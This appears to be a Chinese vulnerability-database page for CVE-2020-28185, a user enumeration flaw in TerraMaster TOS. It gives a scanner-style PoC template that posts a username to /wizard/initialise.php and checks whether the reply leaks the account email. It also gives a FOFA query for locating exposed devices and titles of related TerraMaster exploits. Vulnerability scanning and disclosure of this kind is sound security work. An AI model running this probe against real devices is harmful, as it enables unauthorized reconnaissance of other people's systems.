CVE-2020-28185: TerraMaster TOS 用户枚举漏洞

漏洞描述

PoC代码[已公开]

id: CVE-2020-28185

info:
  name: TerraMaster TOS 用户枚举漏洞
  author: zan8in
  severity: medium
  description: |
    TerraMaster TOS 存在用户枚举漏洞，通过wizard/initialise.php页面的username参数即可枚举系统中的用户，以及泄露邮箱信息
    fofa: "TerraMaster" && header="TOS"
  reference:
    - https://www.tenable.com/security/research/tra-2020-54
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28185
  tags: cve,cve2020,terramaster,enum
  created: 2023/06/23

rules:
  r0:
    request:
      method: POST
      path: /wizard/initialise.php
      body: tab=checkuser&username=admin
    expression: |
      response.status == 200 && response.body.bcontains(b'{"username":"admin","email":"') && response.body.bcontains(b'"status":1')
expression: r0()

相关漏洞推荐

• POC CVE-2020-15568: TerraMaster TOS <.1.29 - Remote Code Execution
• POC CVE-2020-28185: TerraMaster TOS < 4.2.06 - User Enumeration
• POC CVE-2020-28188: TerraMaster TOS - Unauthenticated Remote Command Execution
• POC CVE-2022-24990: TerraMaster TOS < 4.2.30 Server Information Disclosure
• POC CVE-2020-15568: TerraMaster TOS v4.1.24 RCE
• POC CVE-2020-28187: TerraMaster TOS 后台任意文件读取漏洞
• POC CVE-2020-28188: TerraMaster TOS Unauthenticated Remote Command Execution
• POC CVE-2022-24990: TerraMaster TOS 信息泄漏漏洞
• TerraMaster TOS 用户枚举漏洞（CVE-2020-28185）
• TerraMaster-TOS 前台存在远程命令执行漏洞
• TerraMaster TOS CVE-2022-24990信息泄露漏洞
• TerraMaster TOS CVE-2022-24990信息泄露漏洞
• TerraMaster TOS远程代码执行漏洞